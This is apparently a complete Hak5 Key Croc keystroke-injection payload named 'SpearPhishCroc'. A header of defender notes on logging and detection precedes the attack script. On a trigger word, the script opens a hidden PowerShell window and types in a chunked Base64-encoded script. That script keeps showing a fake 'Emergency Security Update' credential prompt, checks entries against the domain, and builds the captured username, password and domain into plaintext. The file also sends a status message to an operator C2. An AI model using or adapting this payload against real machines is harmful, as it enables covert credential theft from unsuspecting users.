# SpearPhishCroc
#
# Version: 1.0
# OS:      Windows
# Author:  0i41E
# Credit:  idea and code based on Invoke-CredentialsPhish from Nikhil Mittal
#
# Behaviour: shows a credential prompt on the target that keeps coming back
# until the entered credentials validate.
#
# NOTE(review): the MATCH / Q / C2NOTIFY commands look like a Hak5 Key Croc
# payload; confirm against the device documentation.
#
# Defender notes:
#   - Execution chain: Run dialog -> hidden PowerShell -> a second
#     powershell.exe started with -enc. Process-creation logging that records
#     command lines (Security event 4688 with command-line auditing, Sysmon
#     event 1) shows both launches.
#   - PowerShell Script Block Logging (event 4104) records the decoded script
#     even though it is delivered Base64-encoded.
#   - Decoded, the blob is UTF-16LE PowerShell that loops on
#     $host.ui.PromptForCredential (title "Emergency Security Update") and
#     checks each entry with PrincipalContext.ValidateCredentials and a
#     DirectoryEntry bind. Wrong entries may therefore show up as failed
#     authentication attempts; verify in your environment.
#   - A successful entry is assembled into a plaintext string inside that
#     PowerShell session, so any credentials typed into the prompt should be
#     treated as compromised and rotated.
#   - Prevention is largely physical and device control: inspect keyboard
#     cabling for inline hardware and restrict unknown USB HID devices.

# Trigger: the payload runs once this pattern is seen in the typed keystrokes.
MATCH phishy

# Keymap used for the injected keystrokes (de = German layout).
export DUCKY_LANG=de

# Status message to the operator's C2.
# NOTE(review): implies the device has its own network link; confirm.
C2NOTIFY INFO 'SpearPhish attack started!'

# Stage 1: open the Run dialog and start PowerShell with
# -NoP (no profile), -NonI (non-interactive) and -w hidden (hidden window).
DELAY 1500
Q GUI r
Q DELAY 500
Q STRING powershell -NoP -NonI -w hidden
Q DELAY 250
Q ENTER

# Stage 2: type a second powershell.exe invocation into the hidden session.
# Its -enc argument is the Base64 script, sent in chunks with a 100 ms pause
# after each chunk.
DELAY 200
Q STRING "powershell.exe -enc WwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAKQBdAA0ACgBQAGEAcgBhAG0AIAAoACkADQAKAA0ACgAgACAAIAAgACQARQBy"
Q DELAY 100
Q STRING "AHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgANAAoAIAAgACAAIABB"
Q DELAY 100
Q STRING "AGQAZAAtAFQAeQBwAGUAIAAtAGEAcwBzAGUAbQBiAGwAeQBuAGEAbQBlACAAcwB5AHMAdABlAG0ALgBEAGkAcgBlAGMAdABvAHIAeQBTAGUAcgB2AGkAYwBlA"
Q DELAY 100
Q STRING "HMALgBhAGMAYwBvAHUAbgB0AG0AYQBuAGEAZwBlAG0AZQBuAHQAIAANAAoAIAAgACAAIAAkAEQAUwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AH"
Q DELAY 100
Q STRING "MAdABlAG0ALgBEAGkAcgBlAGMAdABvAHIAeQBTAGUAcgB2AGkAYwBlAHMALgBBAGMAYwBvAHUAbgB0AE0AYQBuAGEAZwBlAG0AZQBuAHQALgBQAHIAaQBuAGM"
Q DELAY 100
Q STRING "AaQBwAGEAbABDAG8AbgB0AGUAeAB0ACgAWwBTAHkAcwB0AGUAbQAuAEQAaQByAGUAYwB0AG8AcgB5AFMAZQByAHYAaQBjAGUAcwAuAEEAYwBjAG8AdQBuAHQA"
Q DELAY 100
Q STRING "TQBhAG4AYQBnAGUAbQBlAG4AdAAuAEMAbwBuAHQAZQB4AHQAVAB5AHAAZQBdADoAOgBNAGEAYwBoAGkAbgBlACkADQAKACAAIAAgACAAJABkAG8AbQBhAGkAb"
Q DELAY 100
Q STRING "gBEAE4AIAA9ACAAIgBMAEQAQQBQADoALwAvACIAIAArACAAKABbAEEARABTAEkAXQAiACIAKQAuAGQAaQBzAHQAaQBuAGcAdQBpAHMAaABlAGQATgBhAG0AZQ"
Q DELAY 100
Q STRING "ANAAoAIAAgACAAIAB3AGgAaQBsAGUAKAAkAHQAcgB1AGUAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABjAHIAZQBkAGUAbgB0AGkAYQB"
Q DELAY 100
Q STRING "sACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAFAAcgBvAG0AcAB0AEYAbwByAEMAcgBlAGQAZQBuAHQAaQBhAGwAKAAiAEUAbQBlAHIAZwBlAG4AYwB5ACAAUwBlA"
Q DELAY 100
Q STRING "GMAdQByAGkAdAB5ACAAVQBwAGQAYQB0AGUAIgAsACAAIgBQAGwAZQBhAHMAZQAgAGUAbgB0AGUAcgAgAHkAbwB1AHIAIAB1AHMAZQByAG4AYQBtAGUAIABhAG4"
Q DELAY 100
Q STRING "AZAAgAHAAYQBzAHMAdwBvAHIAZAAuACIALAAgACIAIgAsACAAIgAiACkADQAKACAAIAAgACAAIAAgACAAIABpAGYAKAAkAGMAcgBlAGQAZQBuAHQAaQBhAGwAK"
Q DELAY 100
Q STRING "QANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwByAGUAZABzACAAPQAgACQAYwByAGUAZABlAG4AdABpAGEAbAAu"
Q DELAY 100
Q STRING "AEcAZQB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbAAoACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAHU"
Q DELAY 100
Q STRING "AcwBlAHIAIAA9ACAAJABjAHIAZQBkAHMALgB1AHMAZQByAG4AYQBtAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAHAAYQ"
Q DELAY 100
Q STRING "BzAHMAIAA9ACAAJABjAHIAZQBkAHMALgBwAGEAcwBzAHcAbwByAGQADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAGQAbwBtA"
Q DELAY 100
Q STRING "GEAaQBuACAAPQAgACQAYwByAGUAZABzAC4AZABvAG0AYQBpAG4ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYQB1AHQAaABsAG8AYwBhAGwAIAA9ACAAJ"
Q DELAY 100
Q STRING "ABEAFMALgBWAGEAbABpAGQAYQB0AGUAQwByAGUAZABlAG4AdABpAGEAbABzACgAJAB1AHMAZQByACwAIAAkAHAAYQBzAHMAKQANAAoAIAAgACAAIAAgACAAIAAgA"
Q DELAY 100
Q STRING "CAAIAAgACAAJABhAHUAdABoAGQAbwBtAGEAaQBuACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQByAGUAYwB0AG8AcgB5AFMAZQB"
Q DELAY 100
Q STRING "yAHYAaQBjAGUAcwAuAEQAaQByAGUAYwB0AG8AcgB5AEUAbgB0AHIAeQAoACQAZABvAG0AYQBpAG4ARABOACwAJAB1AHMAZQByACwAJABwAGEAcwBzACkADQAKACAA"
Q DELAY 100
Q STRING "IAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAoACgAJABhAHUAdABoAGwAbwBjAGEAbAAgAC0AZQBxACAAJAB0AHIAdQBlACkAIAAtAG8AcgAgACgAJABhAHUAdABoA"
Q DELAY 100
Q STRING "GQAbwBtAGEAaQBuAC4AbgBhAG0AZQAgAC0AbgBlACAAJABuAHUAbABsACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIA"
Q DELAY 100
Q STRING "AgACAAIAAgACAAIAAgACAAIAAkAG8AdQB0AHAAdQB0ACAAPQAgACIAVQBzAGUAcgBuAGEAbQBlADoAIAAiACAAKwAgACQAdQBzAGUAcgAgACsAIAAiACAAUABhAHMA"
Q DELAY 100
Q STRING "cwB3AG8AcgBkADoAIAAiACAAKwAgACQAcABhAHMAcwAgACsAIAAiACAARABvAG0AYQBpAG4AOgAiACAAKwAgACQAZABvAG0AYQBpAG4AIAArACAAIgAgAEQAbwBtAG"
Q DELAY 100
Q STRING "EAaQBuADoAIgArACAAJABhAHUAdABoAGQAbwBtAGEAaQBuAC4AbgBhAG0AZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG8AdQB0AHAAdQB0A"
Q DELAY 100
Q STRING "A0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAg"
Q DELAY 100
Q STRING "AH0ADQAKACAAIAAgACAAfQA="
Q DELAY 100
Q ENTER